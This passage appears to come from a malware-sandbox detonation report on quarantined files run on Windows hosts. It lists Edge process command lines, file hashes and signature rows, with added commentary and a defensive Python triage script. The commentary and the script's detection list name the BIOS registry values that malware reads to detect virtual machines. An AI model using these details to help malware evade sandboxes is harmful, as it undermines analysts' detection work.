PID 1864 wrote to memory of 3648 (2 events) N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1864 wrote to memory of 1704 (40 events) N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1864 wrote to memory of 1136 (2 events) N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1864 wrote to memory of 3632 (20 events) N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
(64 rows collapsed by target PID; every source and target image is msedge.exe)
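The three Edge signatures above (FindShellTrayWindow, SendNotifyMessage, and a parent msedge.exe writing into child msedge.exe processes) are generic API-usage heuristics that a Chromium browser trips on its own: the browser process writes its sandbox policy into each child it spawns from its own image before resuming that child, so same-image parent-to-child writes are the expected shape here. The registry hits deserve the closer look, because BIOS SystemManufacturer and SystemProductName are exactly the values malware reads to detect a virtual machine, so the question for a reviewer is which process read them. The script below is an added example written for this page, not code from the report or from the sandbox vendor. It parses constructed copies of the row formats used above plus one hypothetical cross-image WriteProcessMemory row (a dropper.exe writing into explorer.exe, which does not occur in this report), and reports VM-fingerprint reads per process and write counts per PID pair, separating same-image from cross-image writes. The list of VM-fingerprint registry values is an assumption of the example, not something taken from the report.

```python
"""Triage of sandbox signature rows of the kind shown above.

Added example, not part of the report.  Answers two questions:
  1. which registry reads look like VM/sandbox fingerprinting, per process;
  2. which WriteProcessMemory events are cross-image (source and target
     images differ) rather than a parent writing into a child spawned from
     the same binary, which is normal for Chromium's multi-process model.
"""
import re
from collections import Counter, defaultdict

# Registry values commonly read to fingerprint a VM.  Assumption of this
# example: a small starter list, not one taken from the report.
VM_FINGERPRINT_VALUES = {
    v.lower()
    for v in (
        r"HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer",
        r"HARDWARE\DESCRIPTION\System\BIOS\SystemProductName",
        r"HARDWARE\DESCRIPTION\System\SystemBiosVersion",
        r"HARDWARE\DESCRIPTION\System\VideoBiosVersion",
    )
}

# "Key value queried <path> <process> <target>", optionally with "= <value>"
# after the path on "Set value" rows.  Registry paths and process paths may
# both contain spaces, so they are matched non-greedily.
REG_ROW = re.compile(
    r"^(?P<op>Key opened|Key created|Key value queried|Set value \([a-z]+\))\s+"
    r"(?P<path>\\REGISTRY\\.+?)"
    r"(?:\s+=\s+(?P<value>.+?))?"
    r"\s+(?P<proc>[A-Za-z]:\\.+?\.exe)\s+(?P<target>\S+)$",
    re.IGNORECASE,
)
# "PID <src> wrote to memory of <dst> <indicator> <process> <target process>"
WPM_ROW = re.compile(
    r"^PID (?P<src>\d+) wrote to memory of (?P<dst>\d+)\s+(?P<indicator>\S+)\s+"
    r"(?P<proc>[A-Za-z]:\\.+?\.exe)\s+(?P<target>[A-Za-z]:\\.+?\.exe)$",
    re.IGNORECASE,
)

# Constructed sample: rows copied from the report plus one hypothetical
# cross-image write (PID 4321 dropper.exe -> explorer.exe) that is not in it.
SAMPLE_ROWS = r"""
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3" C:\Program Files\Internet Explorer\iexplore.exe N/A
PID 1864 wrote to memory of 3648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1864 wrote to memory of 3648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1864 wrote to memory of 1704 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4321 wrote to memory of 5000 N/A C:\Users\Admin\AppData\Local\Temp\dropper.exe C:\Windows\explorer.exe
"""


def parse_rows(text):
    """Split report rows into registry events and WriteProcessMemory events."""
    reg, wpm = [], []
    for line in text.splitlines():
        line = line.strip()
        m = REG_ROW.match(line)
        if m:
            reg.append(m.groupdict())
            continue
        m = WPM_ROW.match(line)
        if m:
            wpm.append(m.groupdict())
    return reg, wpm


def vm_fingerprint_reads(reg_rows):
    """Map process image -> VM-fingerprint values it queried (reads only)."""
    hits = defaultdict(list)
    for r in reg_rows:
        if r["op"].lower() != "key value queried":
            continue
        rel = r["path"].lower().split("\\registry\\machine\\", 1)[-1]
        if rel in VM_FINGERPRINT_VALUES:
            hits[r["proc"]].append(rel)
    return dict(hits)


def classify_memory_writes(wpm_rows):
    """Count writes per (source PID, target PID); list cross-image writes."""
    per_pair = Counter((r["src"], r["dst"]) for r in wpm_rows)
    cross_image = [r for r in wpm_rows if r["proc"].lower() != r["target"].lower()]
    return per_pair, cross_image


def triage(text):
    reg, wpm = parse_rows(text)
    per_pair, cross = classify_memory_writes(wpm)
    return {
        "registry_events": len(reg),
        "vm_fingerprint": vm_fingerprint_reads(reg),
        "write_counts": dict(per_pair),
        "cross_image_writes": [(r["src"], r["proc"], r["dst"], r["target"]) for r in cross],
    }


if __name__ == "__main__":
    for key, val in triage(SAMPLE_ROWS).items():
        print(f"{key}: {val}")
```

Run against the full signature tables of a detonation, the output for behavioral21 is two VM-fingerprint reads attributed to msedge.exe and four PID pairs with no cross-image writes, which is the concise statement that these signatures are browser noise; the same script on a detonation where the reader of SystemManufacturer is an unsigned binary from %TEMP%, or where the write target image differs from the source, surfaces the rows that matter.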

Processes

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument C:\Users\Admin\AppData\Local\Temp\quarantine\ninite22.html

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa405a46f8,0x7ffa405a4708,0x7ffa405a4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2040,9564858806168380948,8445350512554345186,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2084 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2040,9564858806168380948,8445350512554345186,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2220 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2040,9564858806168380948,8445350512554345186,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2912 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,9564858806168380948,8445350512554345186,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3268 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,9564858806168380948,8445350512554345186,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2040,9564858806168380948,8445350512554345186,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5200 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2040,9564858806168380948,8445350512554345186,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5200 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,9564858806168380948,8445350512554345186,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4768 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,9564858806168380948,8445350512554345186,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5316 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,9564858806168380948,8445350512554345186,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,9564858806168380948,8445350512554345186,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2040,9564858806168380948,8445350512554345186,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5292 /prefetch:2

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp

Files

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 9f4a0b24e1ad3a25fc9435eb63195e60
SHA1 052b5a37605d7e0e27d8b47bf162a000850196cd
SHA256 7d70a8fc286520712421636b563e9ee32335bca9a5be764544a084c77ddd5feb
SHA512 70897560b30f7885745fede85def923fb9a4f63820e351247d5dcbe81daab9dab49c1db03b29c390f58b3907d5025737a84fff026af2372c3233bc585dcfd284

\??\pipe\LOCAL\crashpad_1864_BHZSMGQVNFLXIUPY

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 4c9b7e612ef21ee665c70534d72524b0
SHA1 e76e22880ffa7d643933bf09544ceb23573d5add
SHA256 a64366387921aba157bba7472244791d5368aef8ecaf6472b616e1e130d7d05e
SHA512 e195e1ce5e7c06d193aa1f924d0079ea72b66eb22c3aea5b6811172251768f649368734e817996d9f0f72ddfd0e2bf2454aaee0bc650eaffd56fa125a334ae88

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 7090de84491c5e1e8ec0d01346375245
SHA1 01985b812cd94660ead8147ab488bf165996c35c
SHA256 11c470bb14e6809cae3100ab36b25f5157016cba0e4de184dc40788f6e0f1117
SHA512 07a7484a32609db74c59c22c706b4f5f68de98b662a78cb2f7c95cd04ab162ad3ba1fd3da63c1a2697f9d0bb75b8a7aaa2b93da7f0dc7658eda90698d2bcea3f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 abeab67aa0422831e5be2c4cc6babc67
SHA1 7b2d7a83d472a24248a15bf846a9abf434e4d0fd
SHA256 b7c0db367f35758b7083f790eea2c43d7a9b895b195ab3d68fc16c9d350152fa
SHA512 fc30f21a3a920bba27ae141d5d595e8829aa70202b333787d3d6bfb3ba26852688c11ce201eac9afb2db3d977a689a6e1d50311a4897177cb75a1808612a6c22

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 ad300fb8424786dd9032c73a7f0e261e
SHA1 b761618d04225610947344db4a5b8226bb90ec00
SHA256 aeebe5f7bf4bca51199ef02ed02984155a16e361ee5100430065bcb224ea8969
SHA512 82ce22df63cbb63c3d58f942b69ea4bca392c084f67305c5f63744afd7f4bf571222d4d3118816e60f91f0cf4ac9d9ea75cff5c6334aed1f486d3502d519ad00

Analysis: behavioral29

Detonation Overview

Submitted

2025-02-26 23:27

Reported

2025-02-26 23:30

Platform

win7-20240729-en

Max time kernel

122s

Max time network

123s

Command Line

"C:\Users\Admin\AppData\Local\Temp\quarantine\xqWgymz.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\quarantine\xqWgymz.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\xqWgymz.exe"

Network

N/A

Files

memory/2916-0-0x000000013F610000-0x000000013F7BE000-memory.dmp

Analysis: behavioral12

Detonation Overview

Submitted

2025-02-26 23:27

Reported

2025-02-26 23:30

Platform

win10v2004-20250217-en

Max time kernel

145s

Max time network

139s

Command Line

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument C:\Users\Admin\AppData\Local\Temp\quarantine\IxZcQMy.html

Signatures

Browser Information Discovery

discovery

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2560 wrote to memory of 1568 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 1568 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 1544 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 1544 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 1544 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 1544 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 1544 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 1544 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 1544 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 1544 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 1544 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 1544 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 1544 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 1544 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 1544 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 1544 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 1544 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 1544 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 1544 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 1544 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 1544 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 1544 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 1544 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 1544 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 1544 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 1544 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 1544 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 1544 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 1544 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 1544 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 1544 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 1544 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 1544 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 1544 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 1544 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 1544 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 1544 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 1544 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 1544 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 1544 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 1544 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 1544 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 3052 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 3052 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 3812 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
